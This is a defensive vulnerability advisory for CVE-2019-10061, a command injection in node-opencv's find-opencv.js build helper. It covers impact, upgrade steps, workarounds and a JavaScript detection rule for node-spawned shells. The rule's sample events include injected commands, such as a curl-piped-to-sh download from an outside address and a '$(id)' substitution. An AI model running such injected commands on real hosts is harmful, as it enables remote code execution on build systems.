CVE-2019-10061

9.8 CRITICAL

📋 TL;DR

CVE-2019-10061 is a command injection vulnerability in utils/find-opencv.js, a helper script shipped with node-opencv (the npm package `opencv`). The script builds a shell command from input it does not validate, so whoever controls that input can run arbitrary commands on the host executing the script. All versions prior to 6.1.0 are affected. The CVSS score of 9.8 reflects the potential for complete compromise of that host; note that the script runs when the package is installed or rebuilt, so the exposed surface is the build or install environment rather than a request path in the running application.

💻 Affected Systems

Products:
  • node-opencv (OpenCV bindings for Node.js)
Versions: All versions prior to 6.1.0
Operating Systems: All platforms where Node.js runs (Linux, Windows, macOS)
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerable code is utils/find-opencv.js, the helper node-opencv uses to locate the OpenCV headers and libraries (via pkg-config) when its native addon is built. It is invoked during install and rebuild, not by application code at runtime, so exposure depends on who can influence the input the script receives in that build step.

📦 What is this software?

node-opencv (published on npm as `opencv`) provides OpenCV bindings for Node.js. It is a native addon that is compiled against a locally installed OpenCV when the package is installed, and utils/find-opencv.js is the helper that locates that installation during the build.

⚠️ Risk & Real-World Impact

🔴 Worst Case: complete takeover of the build or install host, with root privileges if the install runs as root (common in container image builds), followed by data exfiltration, ransomware deployment, or use of the host as a pivot point for lateral movement. A compromised build host can also poison the artifacts it produces.

🟠 Likely Case: arbitrary command execution with the privileges of the process running the install, potentially leading to theft of build secrets and credentials, service disruption, or installation of backdoors.

🟢 If Mitigated: limited impact if the script never receives untrusted input, or if validation prevents exploitation; the vulnerable code is still present until the package is updated.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires control over the input that the script interpolates into the shell command it runs. Because the script executes during package installation and rebuild rather than at application runtime, the realistic entry points are the build environment: a CI job, a container image build, or any other step an attacker can influence so that the script receives crafted input. The script is not itself reachable over the network; the Internet-Facing rating above describes the exposure of a host that builds this package, not a listening service.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 6.1.0 and later

Vendor Advisory: https://www.npmjs.com/advisories/789

Restart Required: Yes

Instructions:

1. Update node-opencv to 6.1.0 or later. npm update opencv only moves the package within the semver range declared in package.json, so if that range is below 6.x (for example ^5.0.0) run npm install opencv@^6.1.0 instead. Either way npm rebuilds the native addon, which is when the patched script runs.
2. Restart any Node.js process that has loaded the library; the previously compiled addon stays in memory until then.
3. Verify with npm list opencv that the resolved version is 6.1.0 or later.

🔧 Temporary Workarounds

Input Validation/Sanitization

all

Keep untrusted values out of the script's input altogether: the script is invoked by the build step, so control the arguments and environment of that step (for example, do not let CI parameters or pull-request content flow into it). Sanitizing shell metacharacters after the fact is a weaker substitute and easy to get wrong.

Script Removal/Restriction

linux

Remove or restrict execution of utils/find-opencv.js if it is not required. It is only needed while the native addon is being built, so on an already-built artifact the file can be removed:

rm -f node_modules/opencv/utils/find-opencv.js

Caveat: any later npm install, npm rebuild or Node.js upgrade will either fail for lack of the script or restore it from the package tarball, so this only holds in an immutable image and is not a fix.

🧯 If You Can't Patch

  • Keep untrusted input out of the build step that runs the script; treat anything that can reach it (CI parameters, environment variables, repository content) as attacker-controlled
  • Run npm install and build steps, not only the application, with minimal privileges and in isolated, disposable environments, since the script executes at install time

🔍 How to Verify

Check if Vulnerable:

Check if node-opencv version is below 6.1.0 using npm list opencv or check package.json.

Check Version:

npm list opencv | grep opencv

Verify Fix Applied:

Confirm with npm list opencv that the resolved version is 6.1.0 or higher. The version is the reliable check; if you inspect utils/find-opencv.js itself, look at whether the script still builds a shell command string from its input rather than for the mere presence of a sanitization routine.

📡 Detection & Monitoring

Log Indicators:

  • Unusual command execution patterns from Node.js processes
  • Suspicious child process spawning

Network Indicators:

  • Unexpected outbound connections from Node.js applications

SIEM Query:

process.parent.name:node AND process.name:(sh OR bash OR dash OR cmd.exe OR powershell.exe)

Field names follow ECS; adapt them to your schema. Match on the child process and its parent rather than on substrings of the node process's own arguments: a pattern such as process.args:*sh* matches almost every command line and is unusable as an alert. Expect benign hits from build steps, including the legitimate pkg-config call node-opencv makes during installation, so baseline against install windows and escalate shells whose command line carries a second command (;, &&, |, $( ) or makes outbound connections.
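The detection logic behind that query, as an added example run over constructed process events rather than real logs: flag a shell spawned directly by node whose command line carries a second command. The events, host names, timestamps and the 203.0.113.5 address are made up for this page; the ECS-style field layout (process.name, process.args, process.parent.*) is an assumption about the telemetry, and the rule is illustrative, not part of the advisory.

```javascript
// Added example: detect node -> shell spawns whose command line carries a second command.
// Events are constructed for this page; the ECS-like field layout is assumed.
const SHELLS = new Set(['sh', 'bash', 'dash', 'zsh', 'cmd.exe', 'powershell.exe']);

// A second command riding on the first: separators, pipes, backticks, $( ) substitution.
const SECOND_COMMAND = /[;&|`\n]|\$\(/;

const SAMPLE_EVENTS = [
  // Legitimate pkg-config lookup made while node-opencv is being built.
  { '@timestamp': '2019-03-26T10:00:01Z', host: 'build-01',
    process: { name: 'sh', args: ['sh', '-c', 'pkg-config opencv --cflags'],
               parent: { name: 'node', args: ['node', 'utils/find-opencv.js', '--cflags'] } } },
  // Injected: a download-and-execute riding on the same invocation.
  { '@timestamp': '2019-03-26T10:00:02Z', host: 'build-01',
    process: { name: 'sh', args: ['sh', '-c', 'pkg-config opencv --cflags; curl http://203.0.113.5/x | sh'],
               parent: { name: 'node', args: ['node', 'utils/find-opencv.js', '--cflags; curl http://203.0.113.5/x | sh'] } } },
  // Unrelated application process; no shell involved.
  { '@timestamp': '2019-03-26T10:05:00Z', host: 'app-07',
    process: { name: 'node', args: ['node', 'server.js'], parent: { name: 'systemd', args: ['systemd'] } } },
  // Injected via command substitution rather than a separator.
  { '@timestamp': '2019-03-26T10:06:00Z', host: 'build-01',
    process: { name: 'bash', args: ['bash', '-c', 'pkg-config opencv $(id)'],
               parent: { name: 'node', args: ['node', 'utils/find-opencv.js', '$(id)'] } } },
  // node-gyp driving make: a child of node, but not a shell.
  { '@timestamp': '2019-03-26T10:07:00Z', host: 'build-01',
    process: { name: 'make', args: ['make', 'BUILDTYPE=Release'],
               parent: { name: 'node', args: ['node', 'node-gyp', 'rebuild'] } } },
];

// The command string a shell was asked to run: the token after -c (or /c for cmd.exe).
// Without such a flag, fall back to the remaining arguments joined.
function shellCommandOf(args) {
  const i = args.findIndex((a) => a === '-c' || a.toLowerCase() === '/c');
  if (i >= 0 && i + 1 < args.length) return args[i + 1];
  return args.slice(1).join(' ');
}

// Rule: child is a shell, parent is node, and the shell command carries a second command.
// Returns the matching events with the extracted command attached for triage.
function findInjectedShells(events) {
  const hits = [];
  for (const ev of events) {
    const p = ev.process;
    if (!p || !p.parent || p.parent.name !== 'node' || !SHELLS.has(p.name)) continue;
    const cmd = shellCommandOf(p.args || []);
    if (SECOND_COMMAND.test(cmd)) {
      hits.push({ timestamp: ev['@timestamp'], host: ev.host, command: cmd });
    }
  }
  return hits;
}
```

On the sample data this flags the two injected invocations and ignores the legitimate pkg-config call, the application process and make. Real build scripts frequently chain commands with `&&`, so in production treat the separator match as a triage score and pair it with the parent script path and the network indicators listed above rather than alerting on it alone.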

🔗 References

  • https://www.npmjs.com/advisories/789 (npm advisory)
  • https://nvd.nist.gov/vuln/detail/CVE-2019-10061 (NVD entry)
  • https://github.com/peterbraden/node-opencv (project repository)
